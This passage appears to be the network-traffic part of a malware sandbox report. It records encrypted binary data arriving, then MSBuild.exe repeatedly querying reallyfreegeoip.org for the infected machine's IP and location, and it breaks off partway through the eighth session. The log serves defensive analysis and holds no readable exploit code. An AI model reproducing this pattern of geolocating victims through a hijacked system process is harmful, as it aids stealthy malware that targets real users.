2024-07-27 09:01:12 UTC	1369	IN	Data Raw: 55 7e 11 0b b9 fa 60 f0 6b e9 c9 92 b6 3c 1c 51 ef d6 dc 1f 60 c1 3a 0c 26 54 98 90 be 76 e0 83 7f 60 b5 69 77 37 49 e3 c9 ed 27 29 56 9b 1f 76 f8 c4 35 ef 7b 8f 59 e9 3c 11 8a f5 c7 f1 7e fc d5 7a 48 9d e0 c5 19 61 30 06 eb 31 64 d1 57 e3 44 9f 27 87 2f d2 0a 88 8c 52 86 63 0b 51 d2 55 cf 76 8e 0c f7 f6 44 a8 a3 ae 00 44 a3 c5 5c 51 5c 30 0e 48 52 bd 94 b5 58 47 12 00 14 ca 2f 25 8c 40 dc 20 ba 38 3c 93 20 c1 de b1 66 e3 8e d6 0b b8 f7 2d 46 fe f9 0e 88 a8 f5 a4 4d 00 cf d1 a9 8e ba f2 bf b8 67 a8 34 5a 5c 64 d6 1e 2d 06 a3 6a 60 41 74 ce bc 33 42 4d 8c 85 ab 91 84 3d a3 3d b7 d0 51 58 8c 69 9d 0a 0d 74 f2 06 56 a9 48 3c f5 b3 21 e3 39 a6 fa 27 61 fc f5 34 4d cd 45 67 d5 39 c6 5f f0 59 4a 6f a4 64 ef c3 ad 64 f3 fe dc 1c fb cc 19 10 f0 f2 6a 00 87 b0 64 Data Ascii: U~`k<Q`:&Tv`iw7I')Vv5{Y<~zHa01dWD'/RcQUvDD\Q\0HRXG/%@ 8< f-FMg4Z\d-j`At3BM==QXitVH<!9'a4MEg9_YJoddjd
2024-07-27 09:01:12 UTC	1369	IN	Data Raw: 88 0e ec d3 7c fe e4 bc cf 96 f5 ff 8e 71 b4 4e da c4 f1 dd 33 24 94 ff 09 ca c5 0f 52 f8 1f f9 cf 37 59 59 d2 36 db 8f 90 c4 ef 2b 20 50 d2 7b e8 f0 57 1c d7 4f c8 d5 93 f7 0c 40 ba 9f 65 7e 1a 33 35 89 9b 7d 66 64 90 0f 65 c4 7d 42 c7 27 a5 28 b6 3d 89 1d ef 9e c3 f9 4e 4f 8c c1 e1 21 a3 14 be a1 83 3e 14 cf 50 36 8b 49 32 3e 05 22 8b 39 f9 ac 11 ca 4a 6a 51 60 bb c2 9d df 22 db 1a 00 7c 57 64 40 1b 07 f4 3e 22 05 55 ae 19 eb a5 35 b7 f5 cf db c2 bf 6f af f8 58 4d fc 02 81 77 a9 ac 5a b1 24 4a d6 c1 60 47 59 9f 99 9d a0 06 34 95 0b 10 12 85 e8 08 9f 84 a1 b4 2d bc e9 27 5f 9d 6c 57 fe 7b dd c1 c2 cd c2 96 78 94 5c 79 29 8a 51 5b c9 54 10 7f 50 cb 7b 59 6e 7a 94 06 ca c3 e0 e8 c8 1d ce dc 29 0f 1c c9 61 b7 d5 02 95 88 e2 11 7c 13 0d 94 0c 68 e4 02 3a ab Data Ascii: \|qN3$R7YY6+ P{WO@e~35}fde}B'(=NO!>P6I2>"9JjQ`"\|Wd@>"U5oXMwZ$J`GY4-'_lW{x\y)Q[TP{Ynz)a\|h:
2024-07-27 09:01:12 UTC	1369	IN	Data Raw: 15 29 75 44 3d 5a c9 20 51 2d f3 09 d2 31 4a fc bb 47 eb c3 cd 2b 3e c3 6b 82 2d 88 42 bc 45 71 0b 5f f8 27 0b a4 be 3b 2d 33 10 73 7d 8c 98 e1 33 da fe 6e 08 0a 32 5a b5 dc 6c ab e9 4f cc 6e c5 0b b1 2e 83 b4 ca 41 44 89 6b bb 0f 02 27 8a ba d3 f2 37 c8 89 35 84 53 1d f7 80 14 da 7f 12 73 30 90 d1 1f 81 00 7b 9d f0 6f f0 ff 73 90 e3 82 99 da 69 37 64 b4 fe 1d 0a 33 72 ac ff 8c 91 da 8f 9f b0 58 d8 fc 70 0f 80 dd 55 a3 78 a1 f1 4b cc 0d 9b 5b 0e 6f c2 32 11 55 8a 0f 3a 1c c2 04 d6 b8 0b 6d 2e 04 0b 03 b8 96 2a e4 f0 03 f0 15 e7 7a c9 e9 34 a3 ab 6f a0 bd b6 eb 76 28 78 4c 99 28 a6 7e 22 83 82 14 b3 85 88 7a cc cd c3 fe ec d1 39 8c c0 d1 ef 82 7d bf c8 5d a0 84 45 7b f8 6b 83 3f d5 4a 2a 15 c6 75 7e 17 b0 3d 08 77 5d 2f 8c bc d5 04 d2 5c 3e ec 93 0c de 01 Data Ascii: )uD=Z Q-1JG+>k-BEq_';-3s}3n2ZlOn.ADk'75Ss0{osi7d3rXpUxK[o2U:m.z4ov(xL(~"z9}]E{k?Ju~=w]/\>
2024-07-27 09:01:12 UTC	1369	IN	Data Raw: 1e 91 67 53 f3 3b 47 4a 9b d7 b9 31 9a be b5 bf 69 35 6d 32 4d 7d 59 f2 86 8c 1e e0 af 3d f7 44 17 8b d2 f9 31 a2 c3 69 2a 3b 07 71 55 cc a5 f9 f9 cf cf 1d 7a 4a 08 57 e1 b5 85 1d 22 e3 d1 21 4b 33 58 4f 92 f5 69 46 22 35 c6 1a a3 e7 29 ad ed fb 05 d3 ba dc 86 f3 d9 d4 39 3d a3 a0 44 b4 4b 95 0c e6 c7 42 26 0f 51 18 73 3c 4d 1f 77 d1 a5 ab b9 43 93 0d 46 80 c9 c3 71 23 85 64 e4 77 b0 0e 13 ec 04 47 79 44 92 15 d2 c1 be d0 c2 d1 8d 48 fc 8d 18 ec 24 3f b0 6d 5d 6b a4 dc 4c 95 6d f9 42 1c bc 69 93 07 bc 90 7c da a3 46 9c 7c 4c 32 d7 90 19 5b 29 8d b5 cf 73 1c 82 6b 31 e0 8a 11 2b 05 1d 00 ad 85 9c 45 20 e4 b9 31 33 a3 28 93 56 60 45 16 79 78 e1 0a 3d 6e 2b 3d 2a 0a 70 35 15 2e 5f a6 ed 9c f4 1e c7 df 12 d1 1e f6 9d 87 25 55 5d a1 c8 1b b5 e1 67 b8 6e 78 91 Data Ascii: gS;GJ1i5m2M}Y=D1i;qUzJW"!K3XOiF"5)9=DKB&Qs<MwCFq#dwGyDH$?m]kLmBi\|F\|L2[)sk1+E 13(V`Eyx=n+=p5._%U]gnx
2024-07-27 09:01:12 UTC	1369	IN	Data Raw: 52 e3 b6 4c 8a 94 78 26 28 e8 a6 e7 e5 d7 c0 db 13 b4 12 dd 97 31 37 c8 1d d1 f8 f8 e0 85 cb 10 33 c7 a7 e0 a4 ab 41 d8 d8 b8 74 21 9e 20 78 43 c8 cf ca 21 7b e0 bb 41 cd c5 1d a7 d2 36 04 e3 26 c7 ef c4 59 30 f2 87 86 ac 6c 9a 9b a6 6b 23 5d 5d e2 55 7d bd 12 0f a1 1b 8c 21 b8 6b e9 73 35 42 06 0c c1 39 9a fe f8 3a f5 34 b8 fb b1 23 7f b4 da c3 ed bf 03 8a 3b 58 31 87 95 ca 8e b3 bc 2b ae 82 37 bd 6a 5b d7 2b f8 be e0 ee d3 64 42 68 51 72 62 f2 95 c8 94 0b cd 1f b1 6b bb f7 6f 86 a8 9b 3c 36 86 ab f8 9f 2a 4a 7e 8e 07 f4 83 36 e3 97 fc 1d 48 a7 ed d2 a1 ac 1f f5 88 60 25 ae 8a 6e 06 f6 b9 51 05 1a ae c6 27 76 09 cb 27 e4 eb ab 76 f8 a7 7d 8f 50 04 31 62 c3 e9 6d 5a 10 1e 91 7b 07 c8 c9 26 01 5e 25 cc da 00 9c b9 1c 72 6e b2 86 9c 1d c9 80 ab 06 48 43 7d Data Ascii: RLx&(173At! xC!{A6&Y0lk#]]U}!ks5B9:4#;X1+7j[+dBhQrbko<6*J~6H`%nQ'v'v}P1bmZ{&^%rnHC}
2024-07-27 09:01:12 UTC	1369	IN	Data Raw: 13 d5 1d e7 bf 78 fb 83 51 1d 6e 69 d2 90 aa ba 88 ef 76 49 fe 79 b5 9a 09 15 8f 56 51 91 63 c2 b2 17 d3 3e 73 3b 0d 70 6d 4a 20 d0 ef bc a1 7c 8b c7 ae 8f 75 d7 c8 bb 64 a0 42 76 05 51 55 27 dd 0c 1c 7d 61 55 a1 24 f6 a9 68 3d 2a 89 e5 c7 fc 96 2c 2d 0a a1 7a 69 ca 49 db 2a af 59 0d a3 bd 97 c0 db b7 6d 52 76 b5 45 73 c1 1c 8e 42 a2 04 76 a5 12 05 ce f0 39 4d 86 22 f1 ca 40 0d 8e 39 34 69 e2 6f 00 16 44 b4 bf 6c 12 e0 fa f5 c1 fd f6 f9 19 b7 79 8e 9f 6f 54 25 2e a7 21 de 28 cc 08 00 80 44 a7 a4 d4 76 cb fb 45 f8 02 9b 22 0c 38 7b 28 71 f6 7d b3 64 93 43 2e 31 f9 4f cc 97 85 5a 73 08 d3 13 ea ae 20 4c 2e 25 86 8d 18 21 c3 bf 98 67 17 78 50 00 91 4c f7 49 32 e5 96 a8 74 ce 7c d7 a6 1a 85 e8 73 d9 8b 7c 76 02 3a 76 a4 7a 35 a4 4f 41 52 78 27 1c 6a 77 34 88 Data Ascii: xQnivIyVQc>s;pmJ \|udBvQU'}aU$h=,-ziIYmRvEsBv9M"@94ioDlyoT%.!(DvE"8{(q}dC.1OZs L.%!gxPLI2t\|s\|v:vz5OARx'jw4
2024-07-27 09:01:12 UTC	1369	IN	Data Raw: cf 18 02 c8 ee 3d 0c e2 d1 c8 4d 59 a2 1a d0 3e 91 89 61 6c 1a 0d cb f6 61 6e 2c b3 9a fe a9 2e fd 7b 3a e6 31 88 bc b7 e8 0e ea ff 77 fb e5 14 06 c5 44 25 dd c5 f5 ff 02 c1 b6 f3 b8 7a c7 df 02 f8 01 5a 3b ee a7 8a 65 77 3c 09 b2 a8 20 7c 6f 7e bb 14 54 53 de 6c c9 26 7e 26 e4 0c 59 ea 2c ad 51 d5 f7 55 a4 2d cc 2d e9 e5 b3 7c ec 63 33 0e b9 21 fa ff 90 78 c4 6b 46 6a 03 1a 83 83 2b 1e d4 02 e9 25 75 d0 cb 89 40 67 f3 51 a4 a3 2a fa bb 33 40 22 7a 32 47 d8 15 93 fc cd 7a 1e 24 9e a8 98 85 af 89 e2 a6 03 3d ba 12 39 fa 92 63 ed 4d ce 09 37 e7 11 9a f7 02 dc 46 8a 41 88 5a f6 0f 6f 84 3b 91 cb b2 68 ea 96 d5 12 6e 5f ae 10 52 b0 ae 17 c9 8c 53 b1 d5 5f fb 0d 88 5b ee b9 dd de 07 44 90 d6 69 3e f0 fc 8e f0 60 3b ac 0d 6d 58 de 0d 74 d3 89 9c a8 47 cb 6d 7f Data Ascii: =MY>alan,.{:1wD%zZ;ew< \|o~TSl&~&Y,QU--\|c3!xkFj+%u@gQ*3@"z2Gz$=9cM7FAZo;hn_RS_[Di>`;mXtGm
2024-07-27 09:01:12 UTC	1369	IN	Data Raw: 19 5c 4b 28 f4 a2 08 7e 9b 3b 14 32 ed 63 44 1a 47 92 5b e3 4c 1f cf 3a ae 2c 83 1b 13 34 12 96 c6 7c 50 35 ef 26 22 18 b0 7a 0b 4c ff 40 df c8 a1 15 58 5a 8d c1 bb 52 63 bc 5b 82 32 76 a5 65 10 0d 94 a1 22 36 f3 66 9c 9d 8d 39 0e c0 d7 85 de ad 44 4d 14 3a bf 6c f4 43 03 ce a9 53 29 64 73 be 58 6d 34 af f8 65 96 5d 0a 65 34 56 2f 8c 78 e3 fe f0 fa 64 b8 cd d1 6e 77 d7 f1 a8 0e 6b b0 60 a4 93 32 84 48 1f 45 3c 56 9f e1 e7 2d 34 9e c7 a5 56 89 16 0b fe cf db 6b 19 f9 ef 56 a5 40 8d 97 e1 bc 19 7f 5b ab 90 89 30 a8 a3 f4 2f f8 e7 e5 58 3f 37 93 b7 7b 8a 9a 59 eb 48 9c 69 42 74 83 a4 35 c8 66 cc 2a 4d fd 4f e5 52 d3 96 e9 fe 44 dd b2 0c e5 34 2c b5 8e 02 1d 5b 41 75 1d f9 26 43 31 97 1c 21 82 f0 a4 33 b4 b0 77 c5 78 3c 6b c6 a7 14 f9 49 f2 d9 f9 5e d4 e7 e8 Data Ascii: \K(~;2cDG[L:,4\|P5&"zL@XZRc[2ve"6f9DM:lCS)dsXm4e]e4V/xdnwk`2HE<V-4VkV@[0/X?7{YHiBt5f*MORD4,[Au&C1!3wx<kI^

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49741	188.114.97.3	443	8188	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 09:02:10 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-07-27 09:02:11 UTC	698	IN	HTTP/1.1 200 OK Date: Sat, 27 Jul 2024 09:02:11 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: EXPIRED Last-Modified: Sat, 27 Jul 2024 09:02:11 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MPyF4VEvcV47pDUyYciu3wFGrIItoxmvuwc3qRuuFNLZ%2BPOsjOBbD4IVkVCh1waSOVbr197HODqNB%2BrSeson8U19SrX0wcAtpDndcHk7psMeGIltibqp5BLIUllAFgwD%2BoPRPbED"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a9b72f5bfc0439a-EWR alt-svc: h3=":443"; ma=86400
2024-07-27 09:02:11 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-07-27 09:02:11 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49742	188.114.97.3	443	8188	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 09:02:12 UTC	60	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org
2024-07-27 09:02:13 UTC	702	IN	HTTP/1.1 200 OK Date: Sat, 27 Jul 2024 09:02:12 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 1 Last-Modified: Sat, 27 Jul 2024 09:02:11 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ywAz4ZHJpIrHpxdxn485cMI2nwRDybRQ3ORAPV%2FXt9wDvq1cEV4QLQKpgFa%2BcCInb8He89drJhEKIS1FMqxkqY%2BJh0F43OWy2c5Qy05hxr1J9px5IL0br5Cq08cdV404d1Ted0Tp"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a9b73032ec132e4-EWR alt-svc: h3=":443"; ma=86400
2024-07-27 09:02:13 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-07-27 09:02:13 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49744	188.114.97.3	443	8188	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 09:02:14 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-07-27 09:02:14 UTC	700	IN	HTTP/1.1 200 OK Date: Sat, 27 Jul 2024 09:02:14 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 3 Last-Modified: Sat, 27 Jul 2024 09:02:11 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HfEPQTes9OIXSVokyY40QEXZDmGOrkcgpWtToc1wfq0ip5LBFfZLkEJUnyODPrVz9QkBU3Z9DOrnriLcWJsakjht6l6OZhV8XMUmGR0Uqj20g2JFO%2FXf78wucW509Qolc%2FRnRBu4"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a9b730eef1c4325-EWR alt-svc: h3=":443"; ma=86400
2024-07-27 09:02:14 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-07-27 09:02:14 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49746	188.114.97.3	443	8188	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 09:02:17 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-07-27 09:02:17 UTC	700	IN	HTTP/1.1 200 OK Date: Sat, 27 Jul 2024 09:02:17 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 6 Last-Modified: Sat, 27 Jul 2024 09:02:11 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dffAgDrW6oHbY507IaH1A8ugZ3rJzjng%2B5DmbH8%2FFunCmOM7ZD0cDargNOh6mSrz1IiwfOvGmtbG7yhFbUoioZjN0wcjjrtBiw0Jao6C28dXqP8tkxJvO1q3xg6Fude4vBPAx4DU"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a9b731eeb53198e-EWR alt-svc: h3=":443"; ma=86400
2024-07-27 09:02:17 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-07-27 09:02:17 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49748	188.114.97.3	443	8188	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 09:02:20 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-07-27 09:02:20 UTC	704	IN	HTTP/1.1 200 OK Date: Sat, 27 Jul 2024 09:02:20 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 9 Last-Modified: Sat, 27 Jul 2024 09:02:11 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rsVqAiuF17k4eViVn%2FuJ3w2dREUoJzVIbfiUSOMeHXr8VVqounKP0gNMV3wF6HyMPwxdubcUxfDbKuEd%2F0QzInP55YiKwB8zhUnwQIBnyXhm3%2FY%2F8X2AbOSELLyugJ6hzH4TWHCD"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a9b73330b68434b-EWR alt-svc: h3=":443"; ma=86400
2024-07-27 09:02:20 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-07-27 09:02:20 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49750	188.114.97.3	443	8188	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 09:02:22 UTC	60	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org
2024-07-27 09:02:22 UTC	703	IN	HTTP/1.1 200 OK Date: Sat, 27 Jul 2024 09:02:22 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 11 Last-Modified: Sat, 27 Jul 2024 09:02:11 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EFmvO5TxQSRow%2Bev0ackOGz%2FrNv5jW1K1rtuWn94Yg1htAgivnFSNroLY%2FdBZU9Q0DSMIAHJN1eVVDk3eqDng37iSSiWE1os5KuN6gfmaZmoBaGFNyYTh97cSlFmyrxwD5lolRLJ"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a9b733c6f216a4e-EWR alt-svc: h3=":443"; ma=86400
2024-07-27 09:02:22 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-07-27 09:02:22 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49752	188.114.97.3	443	8188	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
